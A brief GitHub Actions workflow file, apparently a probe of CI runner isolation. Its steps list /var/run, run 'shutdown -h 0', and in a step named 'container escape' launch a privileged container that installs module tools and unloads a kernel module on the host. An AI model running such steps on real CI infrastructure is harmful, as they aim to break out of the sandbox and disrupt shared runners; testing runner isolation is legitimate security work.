on:
  push:
    paths: [.github/workflows/docker.yml]
jobs:
  job:
    runs-on: ubuntu-latest
    container: docker
    steps:
      - run: ls /var/run
      - run: shutdown -h 0
      - name: container escape
        run: docker run --privileged ubuntu sh -c 'apt-get install -y module-init-tools && modprobe -r joypad'
